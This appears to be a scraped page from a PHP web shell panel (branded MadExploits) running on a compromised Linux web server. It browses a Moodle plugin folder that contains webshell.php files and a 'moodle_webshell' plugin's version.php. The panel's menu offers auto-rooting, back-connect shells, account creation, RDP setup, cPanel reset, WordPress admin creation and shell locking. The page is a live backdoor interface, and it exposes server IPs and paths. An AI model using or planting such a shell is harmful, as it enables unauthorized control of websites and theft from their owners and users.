Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.17.165
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
local /
mvd /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxr-xr-x
cli
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
README.md
0
B
-rw-r--r--
externallib.php
297
B
-rw-r--r--
lib.php
222
B
-rw-r--r--
settings.php
224
B
-rw-r--r--
version.php
543
B
-rw-r--r--
webshell.php
2.57
KB
-rw-r--r--
webshell0.php
868
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : version.php
<?php /** * @package moodle_webshell * @copyright 2022, Remi GASCOU (Podalirius) <podalirius@protonmail.com> * @license MIT * @doc https://docs.moodle.org/dev/version.php */ defined('MOODLE_INTERNAL') || die(); $plugin->component = 'local_moodle_webshell'; // Declare the type and name of this plugin. $plugin->version = 2022052100; $plugin->requires = 2014051200; // Moodle 2.7.0 is required. $plugin->maturity = MATURITY_STABLE; // This is considered as ALPHA for production sites. $plugin->release = 'v1.1.0'; // This is our first.
Close